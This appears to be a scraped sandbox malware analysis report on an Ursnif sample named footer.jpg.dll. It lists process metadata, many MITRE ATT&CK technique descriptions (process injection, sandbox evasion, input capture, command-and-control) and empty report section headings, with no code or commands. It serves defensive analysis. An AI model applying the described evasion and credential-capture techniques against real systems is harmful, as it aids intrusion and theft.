Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6808 CREDAT:82966 /prefetch:2
Imagebase:	0xba0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report footer.jpg.dll

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre